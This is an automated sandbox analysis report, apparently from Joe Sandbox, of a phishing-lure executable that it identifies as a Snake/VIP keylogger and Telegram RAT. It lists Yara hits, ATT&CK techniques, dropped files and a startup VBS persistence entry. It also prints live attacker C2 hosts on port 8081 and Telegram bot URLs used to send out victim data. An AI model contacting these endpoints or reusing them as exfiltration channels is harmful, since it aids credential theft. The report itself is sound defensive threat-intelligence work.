                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7432, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ageless.exe.fe0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.ageless.exe.c60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7768, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ageless.exe PID: 7440, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_00F91204
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00F91806
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00DE1204
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00DE1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		1
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		4
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt2
                  Valid Accounts                  		2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS127
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets321
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                  Registry Run Keys / Startup Folder                  		2
                  Valid Accounts                  		Cached Domain Credentials111
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590972 Sample: QUOTATION REQUIRED_Enatel s... Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 13 other signatures 2->52 8 QUOTATION REQUIRED_Enatel s.r.l..exe 3 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\ageless.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 ageless.exe 1 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 ageless.exe 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\...\ageless.vbs, data 14->28 dropped 62 Antivirus detection for dropped file 14->62 64 Multi AV Scanner detection for dropped file 14->64 66 Binary is likely a compiled AutoIt script file 14->66 72 4 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49754, 49772, 49779 UTMEMUS United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49853, 49962 TELEGRAMRU United Kingdom 20->38 40 2 other IPs or domains 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  QUOTATION REQUIRED_Enatel s.r.l..exe39%ReversingLabsWin32.Exploit.VIPKeylogger
                  QUOTATION REQUIRED_Enatel s.r.l..exe35%VirustotalBrowse
                  QUOTATION REQUIRED_Enatel s.r.l..exe100%AviraDR/AutoIt.Gen8
                  QUOTATION REQUIRED_Enatel s.r.l..exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\supergroup\ageless.exe100%AviraDR/AutoIt.Gen8
                  C:\Users\user\AppData\Local\supergroup\ageless.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\supergroup\ageless.exe39%ReversingLabsWin32.Exploit.VIPKeylogger

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  		208.91.199.225
                  		truefalse
                    		high
                    s-part-0017.t-0009.fb-t-msedge.net
                    		13.107.253.45
                    		truefalse
                      		high
                      reallyfreegeoip.org
                      		104.21.96.1
                      		truefalse
                        		high
                        api.telegram.org
                        		149.154.167.220
                        		truefalse
                          		high
                          checkip.dyndns.com
                          		132.226.247.73
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		high
                                  http://checkip.dyndns.org/false
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/RegSvcs.exe, 00000009.00000002.2610745756.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E14000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgRegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://us2.smtp.mailhostbox.comRegSvcs.exe, 00000003.00000002.2611160055.000000000298F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.office.com/lBRegSvcs.exe, 00000003.00000002.2611160055.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002E1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000009.00000002.2610745756.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://varders.kozow.com:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://aborters.duckdns.org:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000003.00000002.2611160055.000000000296D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anotherarmy.dns.army:8081ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/qageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.2611160055.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002DED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000286A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.2611160055.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.2616330427.0000000003813000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2615772081.0000000003C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://reallyfreegeoip.org/xml/ageless.exe, 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2611160055.000000000283F000.00000004.00000800.00020000.00000000.sdmp, ageless.exe, 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2610745756.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              149.154.167.220
                                                                                              		api.telegram.orgUnited Kingdom
                                                                                              		62041TELEGRAMRUfalse
                                                                                              104.21.96.1
                                                                                              		reallyfreegeoip.orgUnited States
                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                              208.91.199.225
                                                                                              		us2.smtp.mailhostbox.comUnited States
                                                                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                              132.226.247.73
                                                                                              		checkip.dyndns.comUnited States
                                                                                              		16989UTMEMUSfalse

                                                                                              General Information

                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                              Analysis ID:1590972
                                                                                              Start date and time:2025-01-14 16:56:12 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 7m 50s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:13
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 80%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 47
                                                                                              • Number of non-executed functions: 305
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.253.45, 172.202.163.200
                                                                                              • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target RegSvcs.exe, PID 7804 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              10:57:18API Interceptor2857592x Sleep call for process: RegSvcs.exe modified
                                                                                              16:57:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              149.154.167.220Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    12.exeGet hashmaliciousUnknownBrowse
                                                                                                      12.exeGet hashmaliciousUnknownBrowse
                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  104.21.96.1k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.uzshou.world/kbd2/?EtJTX=_JVX4ryxDRQpLJF&cNPH=ufZ7RYF4yLxNXVSq5Vx/4TYieRbcnKjskkbM3L5RbgB1pAgqHA7sfCNkYWLyXRMMwBB3JLbYKUw1FAOWml6VLpxPVZ4qXf58MsNUIQgw/PJ5HUGIvLQvrl5frN9PrRFpPiAd2cDcH6Sr
                                                                                                                  gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.dejikenkyu.cyou/58m5/
                                                                                                                  EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.mffnow.info/0pqe/
                                                                                                                  zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.aonline.top/fqlg/
                                                                                                                  QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.mzkd6gp5.top/3u0p/
                                                                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                  • pelisplus.so/administrator/index.php
                                                                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                  • www.mffnow.info/1a34/

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  reallyfreegeoip.orgConfirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 104.21.48.1
                                                                                                                  MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.16.1
                                                                                                                  ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.64.1
                                                                                                                  RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  • 104.21.80.1
